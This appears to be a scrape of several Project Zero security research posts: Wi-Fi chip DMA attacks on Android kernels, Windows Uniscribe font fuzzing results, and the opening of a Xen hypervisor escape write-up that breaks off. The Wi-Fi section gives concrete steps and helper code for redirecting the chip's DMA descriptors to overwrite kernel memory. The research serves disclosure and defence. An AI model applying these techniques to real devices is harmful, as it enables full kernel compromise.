While PCIe enables DMA by design, that still doesn’t imply that any PCIe-connected peripheral should be able to freely access any memory address on the host. Indeed, modern architectures defend themselves against DMA-capable peripherals by including additional memory management units (IOMMUs) on the IO buses connecting the peripherals to main memory.
ARM specifies its own version of an IOMMU, called the “System Memory Management Unit” (SMMU). Among other roles, the SMMU is used in order to manage the memory view exposed to different SoC components. In short, each stream of memory transactions is associated with a “Stream ID”. The SMMU then performs a step called “context determination” in order to translate the Stream ID to the corresponding memory context.
Using the memory context, the SMMU is then able to associate the memory operations with the translation table containing the mappings for the requesting device. Much like a regular ARM MMU, the translation tables are queried in order to translate the input address (either a virtual address or an intermediate physical address) to the corresponding physical address. Of course, along the way the SMMU also ensures that the requested memory operation is, in fact, allowed. If any of these steps fails, a fault is generated.
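Conceptually, the whole pipeline can be modeled in a few lines. This is a toy single-level model for illustration only; real SMMUs walk multi-level ARM translation tables and enforce per-mapping permissions:

```python
class SMMUFault(Exception):
    """Raised when context determination or translation fails."""

def smmu_translate(stream_id, addr, context_map, page_size=4096):
    """Toy SMMU: map a Stream ID to its context (a page->frame dict),
    then translate one input address through that context."""
    context = context_map.get(stream_id)
    if context is None:
        raise SMMUFault("context determination failed")
    frame = context.get(addr // page_size)
    if frame is None:
        raise SMMUFault("unmapped input address")
    return frame * page_size + addr % page_size
```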

While this is all well and good in theory, it still doesn’t mean that an SMMU is, in fact, used in practice. Unfortunately, mobile SoCs are proprietary, so it would be hard to determine how and where SMMUs are actually in place. That said, we can still glean some insight from publicly available information. For example, by going over the IOMMU bindings in the Linux kernel, we can see that apparently both Qualcomm and Samsung have their own proprietary implementations of an SMMU (!), each with its own unique device-tree bindings. However, suspiciously, it seems that the device tree entries for the Broadcom Wi-Fi chip are missing these IOMMU bindings…
Perhaps, instead, Broadcom’s host driver (bcmdhd) manually configures the SMMUs before each peripheral memory access? In order to answer this question, we’ll need to take a closer look at the driver’s implementation of the communication protocol used over PCIe. Broadcom implements their own proprietary protocol called “MSGBUF” in order to communicate with the Wi-Fi chip over PCIe. The host’s implementation of the protocol and the code for handling PCIe can be found under dhd_msgbuf.c and dhd_pcie.c, respectively.
After going through the code, we gain a few key insights into the communication protocol’s inner workings. First, as expected, the driver scans the PCIe interface, accesses the PCI configuration space, and maps all the shared resources into the host’s memory. Next, the host allocates a set of “rings”. Each ring is backed by a DMA-coherent memory region. The MSGBUF protocol uses four rings for data flow, and one ring for control. Each data path (either RX or TX), has two corresponding rings - one to signal the submission of a request, and another to indicate its completion. Yet, there still doesn’t seem to be any reference to an SMMU in the driver so far. Perhaps we have to dig deeper...
So how does the Wi-Fi chip learn about the location of these rings? After all, so far they’re just a bunch of physically contiguous buffers allocated in the driver. Going over the driver’s code, it appears that the host and the chip hold a shared structure, pciedev_shared_t, containing all the PCIe-related metadata, including the location of each of the ring buffers. The host holds its own copy of this structure, but where does the Wi-Fi SoC keep its copy? According to the dhdpcie_readshared function, it appears that the Wi-Fi chip stores a pointer to this structure in the last four bytes of its RAM.
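Locating this structure in a RAM snapshot then boils down to one pointer read. A minimal sketch - the 0x180000 RAM base below is the BCM4339’s, taken here as an assumption, and other chips place their RAM elsewhere:

```python
import struct

RAM_BASE = 0x180000  # BCM4339 RAM base address (assumed for this sketch)

def pcie_shared_offset(ram_snapshot):
    """The chip stores a pointer to pciedev_shared_t in the last four
    bytes of its RAM; convert it into an offset into the snapshot."""
    ptr, = struct.unpack("<I", ram_snapshot[-4:])
    return ptr - RAM_BASE
```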

Let’s go ahead and take a look at the structure’s contents. To make this process slightly easier, I’ve written a small script that takes a firmware RAM snapshot (produced using dhdutil), reads the pointer to the PCIe shared structure from the end of RAM, and dumps out the relevant information:

Following the rings_info_ptr field, we can also dump the information about each of the rings - including their size, current index, and physical memory address:

For starters, we can see that the memory addresses specified in these buffers seem to be, in fact, physical memory addresses from the host’s memory. This is slightly suspicious… In the presence of an SMMU, the chip could have used an entirely different address range (which would have then been translated by the SMMU into physical addresses). However, merely being suspicious is not enough... To check whether or not an SMMU is present (or active), we’ll need to set up a small experiment!
Recall that the MSGBUF protocol uses the aforementioned ring buffers to indicate submission and completion of events, for both the RX and the TX paths. In essence, during transmission of a frame, the host writes to the TX submission ring. Once the chip transmits the frame, it writes to the TX completion ring to indicate as such. Similarly, the host posts empty buffers on the RX submission ring, and the firmware writes to the RX completion ring upon reception of a frame.
If so, what if we were to modify the ring address corresponding to the TX completion ring in the firmware’s PCIe metadata structure, and point it at an arbitrary memory address? If an SMMU is in place and the chosen memory address is not mapped-in for the Wi-Fi chip, the SMMU will generate a fault and no modification will take place. However, if there is no SMMU in place, we should be able to observe this modification by simply dumping the corresponding physical memory range from the host (for example, by using /dev/mem). This small experiment also allows us to avoid reverse-engineering the Wi-Fi firmware’s implementation of the MSGBUF protocol for the time being, which would no doubt be quite tedious.
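Observing the host side of the experiment only requires reading physical memory. A minimal sketch, with the device path parametrized so the same helper works against a memory dump file (on a real device this needs root, and a kernel that doesn’t enforce STRICT_DEVMEM):

```python
def read_phys(addr, size, devmem="/dev/mem"):
    """Read `size` bytes of physical memory starting at `addr`
    through the given /dev/mem-style device (or a dump file)."""
    with open(devmem, "rb") as f:
        f.seek(addr)
        return f.read(size)
```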
To make things more interesting, let’s modify the TX completion ring’s address to point at the beginning of the Linux kernel’s code segment (0x80000 on the Nexus 6P; see /proc/iomem). After generating some Wi-Fi traffic and inspecting the contents of physical memory, we are presented with the following result:

Aha! The Wi-Fi chip managed to DMA into the physical address range containing the host’s kernel, without any interference! This finally confirms our suspicion; either there is no SMMU present, or it isn’t configured to prevent the chip from accessing the host’s RAM.
Not only does this kind of access not require a single vulnerability, but it is also much more reliable to exploit. There’s no need for exact kernel symbols, or any other preliminary information. The Wi-Fi SoC can simply use its DMA access to scan the physical address ranges in order to locate the kernel. Then, it can identify the kernel’s symbol table in RAM, analyse it to locate any kernel function it wishes, and proceed to hijack the function by overwriting its code (one such example can be seen in this similar DMA-like attack). All in all, this style of attack is completely portable and 100% reliable -- a significant step-up from the previous exploit we saw.
Although we could stop here, let’s make one additional small effort in order to get slightly better control over this primitive. While we are able to DMA into the host’s memory, we are doing so rather “blindly” at this point. We do not control the data being written, but instead rely on the Wi-Fi firmware’s implementation of the MSGBUF protocol to corrupt the host’s memory. By delving slightly further, we should be able to figure out how the DMA engine on the Wi-Fi chip works, and manually utilise it to access the host’s memory (instead of relying on side-effects, as shown above).
So where do we start? Searching for the “MSGBUF” string, we can see some initialisation routines related to the protocol, which are part of the special “reclaim” region (and are therefore only used during the chip’s initialisation). Nevertheless, reverse-engineering these functions reveals that they reference a set of functions in the Wi-Fi chip’s RAM. Luckily, some of these functions’ names are present in the ROM! Their names seem quite relevant: “dma64_txfast”, “dma64_txreset” - it seems like we’re on the right track.
Once again, we are spared some reverse-engineering effort. Broadcom’s SoftMAC driver, brcmsmac, contains the implementation for these exact functions. Although we can expect some differences, the general idea should remain the same.
Combing through the code, it appears that for every DMA-capable source or sink, there exists a corresponding DMA metadata structure, called “dma_info”. This structure contains pointers to the DMA RX and TX registers, as well as the DMA descriptor rings into which the DMA source or destination addresses are inserted. Additionally, each structure is assigned an 8-byte name which can be used to identify it. What’s more, every dma_info structure begins with a pointer to the RAM function block containing the DMA functions - the same block we identified earlier. Therefore, we can locate all instances of these DMA metadata structures by simply searching for this pointer in the Wi-Fi SoC’s RAM.
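The pointer scan described above is straightforward to sketch. Note that the offset of the name field within dma_info is an assumption here; the actual layout must be recovered from brcmsmac’s dma_info definition:

```python
import struct

def find_dma_info(ram_snapshot, ram_base, dma_funcs_ptr, name_offset=4):
    """Scan a RAM snapshot for dma_info candidates, identified by their
    leading pointer to the RAM block of DMA functions, and report each
    hit's address and 8-byte name field."""
    needle = struct.pack("<I", dma_funcs_ptr)
    hits = []
    off = ram_snapshot.find(needle)
    while off != -1:
        raw_name = ram_snapshot[off + name_offset:off + name_offset + 8]
        hits.append((ram_base + off,
                     raw_name.split(b"\x00")[0].decode("ascii", "replace")))
        off = ram_snapshot.find(needle, off + 4)
    return hits
```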
Now that we know the format of these metadata structures and have a means to locate them, we can try and search for the instance corresponding to the DMA TX path from the Wi-Fi chip to the host.
Unfortunately, this is easier said than done. After all, we can expect to find multiple instances of these structures, as the Wi-Fi chip performs DMA to and from many sources and sinks. For example, the firmware likely uses SoC-internal DMA engines to access the internal RX and TX FIFOs. So how can we identify the correct DMA descriptor?
Recall that each dma_info structure has an associated “name” field. Let’s search for all the DMA metadata structures in RAM (by searching for the DMA function block pointer), and output the corresponding name for each instance:
Found dma_info - Address: 0x00220288, Name: "wl0"
Found dma_info - Address: 0x00220478, Name: "wl0"
Found dma_info - Address: 0x00220A78, Name: "wl0"
Found dma_info - Address: 0x00221078, Name: "wl0"
Found dma_info - Address: 0x00221BF8, Name: "wl0"
Found dma_info - Address: 0x0022360C, Name: "wl0"
Found dma_info - Address: 0x00236268, Name: "D2H"
Found dma_info - Address: 0x00238B7C, Name: "H2D"
Great! While there are a few nondescript dma_info instances which are probably used internally (as suspected), there are also two instances which seem to correspond to host-to-device (H2D) and device-to-host (D2H) DMA accesses. Since we’re interested in DMA-ing into the host’s memory, let’s take a closer look at the D2H structure:

Note that the RX and TX registers point to an area outside the Wi-Fi firmware’s ROM and RAM. In fact, they point to backplane addresses corresponding to the DMA engine’s registers. In contrast, the RX and TX descriptor ring pointers do, indeed, point to memory locations within the SoC’s RAM.
By going over the DMA code in brcmsmac and the MSGBUF protocol implementation in the host’s driver, we are able to finally piece together the details. First, the host posts physical addresses (corresponding to SKBs) to the chip, using the MSGBUF protocol. These addresses are then inserted into the DMA descriptor rings by the firmware’s MSGBUF implementation. Once the rings are populated, the Wi-Fi chip simply writes to the backplane registers in order to “kick off” the DMA engine. The DMA engine will then go over the descriptor list, and consume the descriptor at the current ring index for the DMA access. Once a DMA descriptor is consumed, its value is set to a special “magic” value (0xDEADBEEF).
Therefore, all we need to do in order to manipulate the DMA engine into writing into our own arbitrary physical address is to modify the DMA descriptor ring. Since the MSGBUF protocol is constantly operating as frames are being sent back and forth, the descriptor rings change rapidly. It would be useful if we could “hook” one of the functions called during the DMA TX flow, allowing us to quickly replace the current descriptors with our own crafted values.
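Modeled in Python, the replacement such a hook needs to perform is simple (the real hook is a small ARM shellcode stub operating on the in-RAM descriptor ring; the magic value is taken from the description above):

```python
DMA_CONSUMED = 0xDEADBEEF  # magic value marking already-consumed descriptors

def retarget_ring(descriptors, target_pa):
    """Point every not-yet-consumed D2H descriptor at our chosen
    physical address, leaving consumed slots untouched."""
    return [target_pa if d != DMA_CONSUMED else d for d in descriptors]
```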
As luck would have it, while the dma64_txfast function is located in ROM, its prologue starts with a branch into RAM. This allows us to use our patcher from the previous blog post in order to hook the function, and execute our own shellcode stub. Let’s write a small stub that simply goes over the D2H DMA descriptors, and changes every non-consumed descriptor to our own pointer. By doing so, subsequent calls to the DMA engine should write the received frame’s contents into the aforementioned address. After applying the patch and generating Wi-Fi traffic, we are greeted with the following result:

Ah-ha! We managed to DMA arbitrary data into an address of our choosing. Using this primitive, we can finally hijack any kernel function with our own crafted data.
Lastly - the experiment described above was performed on a Nexus 6P, which is based on Qualcomm’s Snapdragon 810 SoC. This raises the question: perhaps different SoCs exhibit different behaviour? To test out this theory, let’s repeat the same experiment on a Galaxy S7 Edge, which is based on Samsung’s Exynos 8890 SoC.
Using a previously disclosed privilege escalation to inject code into system_server, we can directly issue the ioctls required to interact with the bcmdhd driver, thus replacing the chip memory access capabilities provided by dhdutil in the above experiment. Similarly, using a previously disclosed kernel exploit, we are able to execute code within the kernel, allowing us to observe changes to the kernel’s code segments.
Putting this together, we can extract the Wi-Fi chip’s (BCM43596) ROM, inspect it, and locate the DMA function as described above. Then, we can insert the same hook, pointing any non-consumed DMA RX descriptors at the kernel code’s physical address. After installing the hook and generating some Wi-Fi traffic, we observe the following result:

Once again we are able to DMA freely into the kernel (bypassing RKP’s protection along the way)! It seems that both Samsung’s Exynos 8890 SoC and Qualcomm’s Snapdragon 810 either lack SMMUs or fail to utilise them.

Afterword
In conclusion, we’ve seen that the isolation between the host and the Wi-Fi SoC can, and should, be improved. While flaws exist in the communication protocols between the host and the chip, these can eventually be solved over time. However, the current lack of protection against a rogue Wi-Fi chip leaves much to be desired.
Since mobile SoCs are proprietary, it remains unknown whether current-gen SoCs are capable of facilitating such isolation. We hope that SoCs that do, indeed, have the capability to enable memory protection (for example, by means of an SMMU), choose to do so soon. For the SoCs that are incapable of doing so, perhaps this research will serve as a motivator when designing next-gen hardware.
The current lack of isolation can also have some surprising side effects. For example, Android contexts which are able to interact with the Wi-Fi firmware can leverage the Wi-Fi SoC’s DMA capability in order to directly hijack the kernel. Therefore, these contexts should be thought of as being “as privileged as the kernel”, an assumption which I believe is not currently made by Android’s security architecture.
The combination of an increasingly complex firmware and Wi-Fi’s incessant onward march hints that firmware bugs will probably be around for quite some time. This hypothesis is supported by the fact that even a relatively shallow inspection of the firmware revealed a number of bugs, all of which were exploitable by remote attackers.
While memory isolation on its own will help defend against a rogue Wi-Fi SoC, the firmware’s defenses can also be bolstered against attacks. Currently, the firmware lacks exploit mitigations (such as stack cookies), and doesn’t make full use of the existing security mechanisms (such as the MPU). Hopefully, future versions are able to better defend against such attacks by implementing modern exploit mitigations and utilising SoC security mechanisms.

Notes on Windows Uniscribe Fuzzing

Google Project Zero - Mon, 04/10/2017 - 10:25
Posted by Mateusz Jurczyk of Google Project Zero
Among the total of 119 vulnerabilities with CVEs fixed by Microsoft in the March Patch Tuesday a few weeks ago, there were 29 bugs reported by us in the font-handling code of the Uniscribe library. Admittedly the subject of font-related security has already been extensively discussed on this blog both in the context of manual analysis [1][2] and fuzzing [3][4]. However, what makes this effort a bit different from the previous ones is the fact that Uniscribe is a little-known user-mode component, which had not been widely recognized as a viable attack vector before, as opposed to the kernel-mode font implementations included in the win32k.sys and ATMFD.DLL drivers. In this post, we outline a brief history and description of Uniscribe, explain how we approached at-scale fuzzing of the library, and highlight some of the more interesting discoveries we have made so far. All the raw reports of the bugs we’re referring to (as they were submitted to Microsoft), together with the corresponding proof-of-concept samples, can be found in the official Project Zero bug tracker [5]. Enjoy!IntroductionIt was November 2016 when we started yet another iteration of our Windows font fuzzing job (whose architecture was thoroughly described in [4]). At that point, the kernel attack surface was mostly fuzz-clean with regards to the techniques we were using, but we still like to play with the configuration and input corpus from time to time to see if we can squeeze out any more bugs with the existing infrastructure. What we ended up with a several days later were a bunch of samples which supposedly crashed the guest Windows system running inside of Bochs. When we fed them to our reproduction pipeline, none of the bugchecks occurred again for unclear reasons. As disappointing as that was, there also was one interesting and unexpected result: for one of the test cases, the user-mode harness crashed itself, without bringing the whole OS down at the same time. 
This could indicate either that there was a bug in our code, or that there was some unanticipated font parsing going on in ring-3. When we started digging deeper, we found out that the unhandled exception took place in the following context:
(4464.11b4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0933d8bf ebx=00000000 ecx=09340ffc edx=00001b9f esi=0026ecac edi=00000009
eip=752378f3 esp=0026ec24 ebp=0026ec2c iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
USP10!ScriptPositionSingleGlyph+0x28533:
752378f3 668b4c5002      mov     cx,word ptr [eax+edx*2+2] ds:002b:09340fff=????
Until that moment, we didn’t fully realize that our tools were triggering any font-handling code beyond the well-known kernel implementation (despite some related bugs having been publicly fixed in the past, e.g. CVE-2016-7274 [6]). As a result, the fuzzing system was not prepared to catch user-mode faults, and thus any such crashes had remained completely undetected in favor of system bugchecks, which caused full machine restarts.
We quickly determined that the usp10.dll library corresponded to “Uniscribe Unicode script processor” (in Microsoft’s own words) [7]. It is a relatively large module (600-800 kB depending on system version and bitness) responsible for rendering Unicode-encoded text, as the name suggests. From a security perspective, it’s important that the code base dates back to Windows 2000, and includes a C++ implementation of the parsing of various complex TrueType/OpenType structures, in addition to what is already implemented in the kernel. The specific tables that Uniscribe touches on are primarily Advanced Typography Tables (“GDEF”, “GSUB”, “GPOS”, “BASE”, “JSTF”), but also “OS/2”, “cmap” and “maxp” to some extent. What’s equally significant is that the code can be reached simply by calling the DrawText [8] or other equivalent API with Unicode-encoded text and an attacker-controlled font. Since no special calls other than the typical ones are necessary to execute the most exposed areas of the library, it makes for a great attack vector in applications which use GDI to render text with fonts originating from untrusted sources. This is also evidenced by the stack trace of the original crash, and the fact that it occurred in a program which didn’t include any usp10-specific code:
0:000> kb
ChildEBP RetAddr
0026ec2c 09340ffc USP10!otlChainRuleSetTable::rule+0x13
0026eccc 0133d7d2 USP10!otlChainingLookup::apply+0x7d3
0026ed48 0026f09c USP10!ApplyLookup+0x261
0026ef4c 0026f078 USP10!ApplyFeatures+0x481
0026ef98 09342f40 USP10!SubstituteOtlGlyphs+0x1bf
0026efd4 0026f0b4 USP10!SubstituteOtlChars+0x220
0026f250 0026f370 USP10!HebrewEngineGetGlyphs+0x690
0026f310 0026f370 USP10!ShapingGetGlyphs+0x36a
0026f3fc 09316318 USP10!ShlShape+0x2ef
0026f440 09316318 USP10!ScriptShape+0x15f
0026f4a0 0026f520 USP10!RenderItemNoFallback+0xfa
0026f4cc 0026f520 USP10!RenderItemWithFallback+0x104
0026f4f0 09316124 USP10!RenderItem+0x22
0026f534 2d011da2 USP10!ScriptStringAnalyzeGlyphs+0x1e9
0026f54c 0000000a USP10!ScriptStringAnalyse+0x284
0026f598 0000000a LPK!LpkStringAnalyse+0xe5
0026f694 00000000 LPK!LpkCharsetDraw+0x332
0026f6c8 00000000 LPK!LpkDrawTextEx+0x40
0026f708 00000000 USER32!DT_DrawStr+0x13c
0026f754 0026fa30 USER32!DT_GetLineBreak+0x78
0026f800 0000000a USER32!DrawTextExWorker+0x255
0026f824 ffffffff USER32!DrawTextExW+0x1e
As can be seen here, the Uniscribe functionality was invoked internally by user32.dll through the lpk.dll (Language Pack) library. As soon as we learned about this new attack vector, we jumped at the first chance to fuzz it. Most of the infrastructure was already in place, since both user- and kernel-mode font fuzzing share a large number of the pieces. The extra work that we had to do was mostly related to filtering the input corpus, fiddling with the mutator configuration, adjusting the system configuration and implementing logic for the detection of user-mode crashes (both in the test harness and Bochs instrumentation). All of these steps are discussed in detail below. After a few days, we had everything working as planned, and after another couple, there were already over 80 crashes at unique addresses waiting for triage. Below is a summary of the issues that were found in the first fuzzing run and reported to Microsoft in December 2016.

Results at a glance
Since ~80 was still a fairly manageable number of crashes to triage manually, we tried to reproduce each of them by hand, deduplicating them and writing down their details at the same time. When we finished, we ended up with 8 separate high-severity issues that could potentially allow remote code execution:
Tracker ID | Memory access type at crash | Crashing function | CVE
1022 | Invalid write of n bytes (memcpy) | usp10!otlList::insertAt | CVE-2017-0108
1023 | Invalid read / write of 2 bytes | usp10!AssignGlyphTypes | CVE-2017-0084
1025 | Invalid write of n bytes (memset) | usp10!otlCacheManager::GlyphsSubstituted | CVE-2017-0086
1026 | Invalid write of n bytes (memcpy) | usp10!MergeLigRecords | CVE-2017-0087
1027 | Invalid write of 2 bytes | usp10!ttoGetTableData | CVE-2017-0088
1028 | Invalid write of 2 bytes | usp10!UpdateGlyphFlags | CVE-2017-0089
1029 | Invalid write of n bytes | usp10!BuildFSM and nearby functions | CVE-2017-0090
1030 | Invalid write of n bytes | usp10!FillAlternatesList | CVE-2017-0072
All of the bugs but one were triggered through a standard DrawText call and resulted in heap memory corruption. The one exception was the #1030 issue, which resided in a documented Uniscribe-specific ScriptGetFontAlternateGlyphs API function. The routine is responsible for retrieving a list of alternate glyphs for a specified character, and the interesting fact about the bug is that it wasn’t a problem with operating on any internal structures. Instead, the function failed to honor the value of the cMaxAlternates argument, and could therefore write more output data to the pAlternateGlyphs buffer than was allowed by the function caller. This meant that the buffer overflow was not specific to any particular memory type – depending on what pointer the client passed in, the overflow would take place on the stack, heap or static memory. The exploitability of such a bug would greatly depend on the program design and compilation options used to build it. We must admit, however, that it is unclear what the real-world clients of the function are, and whether any of them would meet the requirements to become a viable attack target.
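A toy model of the missing check makes the bug class clear. This is not Uniscribe’s actual code - just a sketch of the contract the function was supposed to honor:

```python
def fill_alternates(alternates, out_buf, c_max):
    """Model of ScriptGetFontAlternateGlyphs' contract: never write more
    than c_max entries into the caller-supplied buffer. The vulnerable
    code effectively omitted the clamp below, trusting the font-derived
    count and overflowing whatever memory backed the caller's buffer."""
    n = min(len(alternates), c_max)
    out_buf[:n] = alternates[:n]
    return n
```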
Furthermore, we extracted 27 unique crashes caused by invalid memory reads from non-NULL addresses, which could potentially lead to information disclosure of secrets stored in the process address space. Due to the large volume of these crashes, we were unable to analyze each of them in much detail or perform any advanced deduplication. Instead, we partitioned them by the top-level exception address, and filed all of them as a single entry #1031 in the bug tracker:
  1. usp10!otlMultiSubstLookup::apply+0xa8
  2. usp10!otlSingleSubstLookup::applyToSingleGlyph+0x98
  3. usp10!otlSingleSubstLookup::apply+0xa9
  4. usp10!otlMultiSubstLookup::getCoverageTable+0x2c
  5. usp10!otlMark2Array::mark2Anchor+0x18
  6. usp10!GetSubstGlyph+0x2e
  7. usp10!BuildTableCache+0x1ca
  8. usp10!otlMkMkPosLookup::apply+0x1b4
  9. usp10!otlLookupTable::markFilteringSet+0x1a
  10. usp10!otlSinglePosLookup::getCoverageTable+0x12
  11. usp10!BuildTableCache+0x1e7
  12. usp10!otlChainingLookup::getCoverageTable+0x15
  13. usp10!otlReverseChainingLookup::getCoverageTable+0x15
  14. usp10!otlLigCaretListTable::coverage+0x7
  15. usp10!otlMultiSubstLookup::apply+0x99
  16. usp10!otlTableCacheData::FindLookupList+0x9
  17. usp10!ttoGetTableData+0x4b4
  18. usp10!GetSubtableCoverage+0x1ab
  19. usp10!otlChainingLookup::apply+0x2d
  20. usp10!MergeLigRecords+0x132
  21. usp10!otlLookupTable::subTable+0x23
  22. usp10!GetMaxParameter+0x53
  23. usp10!ApplyLookup+0xc3
  24. usp10!ApplyLookupToSingleGlyph+0x6f
  25. usp10!ttoGetTableData+0x19f6
  26. usp10!otlExtensionLookup::extensionSubTable+0x1d
  27. usp10!ttoGetTableData+0x1a77

In the end, it turned out that these 27 crashes manifested 21 actual bugs, which were fixed by Microsoft as CVE-2017-0083, CVE-2017-0091, CVE-2017-0092 and CVE-2017-0111 to CVE-2017-0128 in the MS17-011 security bulletin.
Lastly, we also reported 7 unique NULL pointer dereference issues with no deadline, in the hope that having any of them fixed would enable our fuzzer to discover other, more severe bugs. On March 17th, MSRC responded that they had investigated the cases and concluded that they were low-severity DoS problems only, and would not be fixed as part of a security bulletin in the near future.

Input corpus, mutation configuration and adjusting the test harness

Gathering a solid corpus of input samples is arguably one of the most important parts of fuzzing preparation, especially if code coverage feedback is not involved, making it impossible for the corpus to gradually evolve into a more optimal form. We were lucky enough to already have several font corpora at our disposal from previous fuzzing runs. We decided to use the same set of files that had helped us discover 18 Windows kernel bugs in the past (see the “Preparing the input corpus” section of [4]). It was originally generated by running a corpus distillation algorithm over a large number of fonts crawled off the web, using an instrumented build of the FreeType2 open-source library, and consisted of 14848 TrueType and 4659 OpenType files, for a total of 2.4G of disk space. In order to better tailor the corpus to Uniscribe, we reduced it to just the files that contained at least one of the “GDEF”, “GSUB”, “GPOS”, “BASE” or “JSTF” tables, which are parsed by the library. This left us with 3768 TrueType and 2520 OpenType fonts consuming 1.68G on disk, which were much more likely to expose bugs in Uniscribe than any of the removed ones. That was the final corpus that we worked with.
The mutator configuration was also pretty similar to what we did for the kernel: we used the same five standard bitflipping, byteflipping, chunkspew, special ints and binary arithmetic algorithms with the precalculated per-table mutation ratio ranges. The only change made specifically for Uniscribe was to add mutations for the “BASE” and “JSTF” tables, which were previously not accounted for.
Last but not least, we extended the functionality of the guest fuzzing harness, responsible for invoking the tested font-related APIs (mostly displaying all of the font’s glyphs at various point sizes, but also querying a number of properties etc.). While it was clear that some of the relevant code was executed automatically through user32!DrawText with no modifications required, we wanted to maximize the coverage of Uniscribe code as much as possible. A full reference of all its externally available functions can be found on MSDN [9]. After skimming through the documentation, we added calls to ScriptCacheGetHeight, ScriptGetFontProperties, ScriptGetCMap, ScriptGetFontAlternateGlyphs, ScriptSubstituteSingleGlyph and ScriptFreeCache. This quickly proved to be a successful idea, as it allowed us to discover the aforementioned generic bug in ScriptGetFontAlternateGlyphs. Furthermore, we decided to remove invocations of the GetKerningPairs and GetGlyphOutline API functions, as their corresponding logic was located in the kernel, while our focus had now shifted strictly to user mode. As such, they wouldn’t lead to the discovery of any new bugs in Uniscribe, but would instead slow the overall fuzzing process down. Apart from these minor modifications, the core of the test harness remained unchanged.
We hoped that the measures listed above would be sufficient to trigger most of the low-hanging-fruit bugs. With this assumption, the only part left was to make sure that crashes would be reliably caught and reported to the fuzzer. This subject is discussed in the next section.

Crash detection

The first step we took to detect Uniscribe crashes effectively was disabling Special Pools for win32k.sys and ATMFD.DLL (which caused unnecessary overhead for no gain in user-mode), while enabling the PageHeap option in Application Verifier for the harness process. This was done to improve our chances of detecting invalid memory accesses, and to make reproduction and deduplication more reliable.
Thanks to the fact that the fuzz-tested code in usp10.dll executed in the same context as the rest of the harness logic, we didn’t have to write a full-fledged Windows debugger to supervise another process. Instead, we just set up a top-level exception handler with the SetUnhandledExceptionFilter function, which then got called every time a fatal exception was generated in the process. The handler’s job was to send out the state of the crashing CPU context (passed in through ExceptionInfo->ContextRecord) to the hypervisor (i.e. the Bochs instrumentation) through the “debug print” hypercall, and then actually report that the crash occurred at the specific address.
In the kernel font fuzzing scenario, crashes were detected by the Bochs instrumentation with the BX_INSTR_RESET instrumentation callback. This approach worked because the guest system was configured to automatically reboot on bugcheck, consequently triggering the bx_instr_reset handler. The easiest way to integrate this approach with user-mode fuzzing would therefore have been to just add an ExitWindowsEx call in the epilogue of the exception handler, making everything work out of the box without even touching the existing Bochs instrumentation. However, that method would result in losing information about the crash location, making automated deduplication impossible. In order to address this problem, we introduced a new “crash encountered” hypercall, which received the address of the faulting instruction as an argument from the guest, and passed this information further down our scalable fuzzing infrastructure. Having the crashes grouped by the exception address right from the start saved us a ton of postprocessing time, and limited the number of test cases we had to look at to a bare minimum.
This concludes the list of differences between the Windows kernel font fuzzing setup we’ve been using for nearly two years now and the equivalent user-mode setup that we built only a few months ago, but which has already proven very effective. Everything else has remained the same as described in the “font fuzzing techniques” article from last year [4].

Conclusions

It is a fascinating but dire realization that even for such a well-known class of bug hunting targets as font parsing implementations, it is still possible to discover new attack vectors dating back to the previous century, which have remained largely unaudited until now while being just as exposed as the interfaces we already know about. We believe that this is a great example of how gradually raising the bar for a variety of software can have much more impact than trying to kill every last bug in a narrow range of code. It is also illustrative of the fact that time spent on thoroughly analyzing the attack surface and looking for little-known targets may turn out to be very fruitful, as the security community still doesn’t have a full understanding of the attack vectors in every important data processing stack (such as Windows font handling in this case).
This effort and its results show that fuzzing is a very universal technique, and most of its components can be easily reused from one target to another, especially within the scope of a single file format. Finally, it has proven that it is possible to fuzz not just the Windows kernel, but also regular user-mode code, regardless of the environment of the host system (which was Linux in our case). While the Bochs x86 emulator incurs a significant overhead compared to native execution speed, this can often be offset by scaling out, still achieving a net gain in the number of iterations per second. As an interesting fact, issues #993 (Windows kernel registry hive loading), #1042 (EMF+ processing in GDI+), #1052 and #1054 (color profile processing) fixed in the last Patch Tuesday were also found by fuzzing Windows on Bochs, but with slightly different input samples, test harnesses and mutation strategies. :)

References
  1. The “One font vulnerability to rule them all” series starting with
Categories: Security

Pandavirtualization: Exploiting the Xen hypervisor

Google Project Zero - Fri, 04/07/2017 - 09:20
Posted by Jann Horn, Project Zero
On 2017-03-14, I reported a bug to Xen's security team that permits an attacker with control over the kernel of a paravirtualized x86-64 Xen guest to break out of the hypervisor and gain full control over the machine's physical memory. The Xen Project publicly released an advisory and a patch for this issue on 2017-04-04.
To demonstrate the impact of the issue, I created an exploit that, when executed in one 64-bit PV guest with root privileges, will execute a shell command as root in all other 64-bit PV guests (including dom0) on the same physical machine.

Background

access_ok()

On x86-64, Xen PV guests share the virtual address space with the hypervisor. The coarse memory layout looks as follows:

Xen allows the guest kernel to perform hypercalls, which are essentially normal system calls from the guest kernel to the hypervisor using the System V AMD64 ABI. They are performed using the syscall instruction, with up to six arguments passed in registers. Like normal syscalls, Xen hypercalls often take guest pointers as arguments. Because the hypervisor shares its address space, it makes sense for guests to simply pass in guest-virtual pointers.
Like any kernel, Xen has to ensure that guest-virtual pointers don't actually point to hypervisor-owned memory before dereferencing them. It does this using userspace accessors that are similar to those in the Linux kernel; for example:
  • access_ok(addr, size) for checking whether a guest-supplied virtual memory range is safe to access - in other words, it checks that accessing the memory range will not modify hypervisor memory
  • __copy_to_guest(hnd, ptr, nr) for copying nr bytes from the hypervisor address ptr to the guest address hnd without checking whether hnd is safe
  • copy_to_guest(hnd, ptr, nr) for copying nr bytes from the hypervisor address ptr to the guest address hnd if hnd is safe

In the Linux kernel, the macro access_ok() checks whether the whole memory range from addr to addr+size-1 is safe to access, using any memory access pattern. However, Xen's access_ok() doesn't guarantee that much:
/*
 * Valid if in +ve half of 48-bit address space, or above Xen-reserved area.
 * This is also valid for range checks (addr, addr+size). As long as the
 * start address is outside the Xen-reserved area then we will access a
 * non-canonical address (and thus fault) before ever reaching VIRT_START.
 */
#define __addr_ok(addr) \
    (((unsigned long)(addr) < (1UL<<47)) || \
     ((unsigned long)(addr) >= HYPERVISOR_VIRT_END))

#define access_ok(addr, size) \
    (__addr_ok(addr) || is_compat_arg_xlat_range(addr, size))
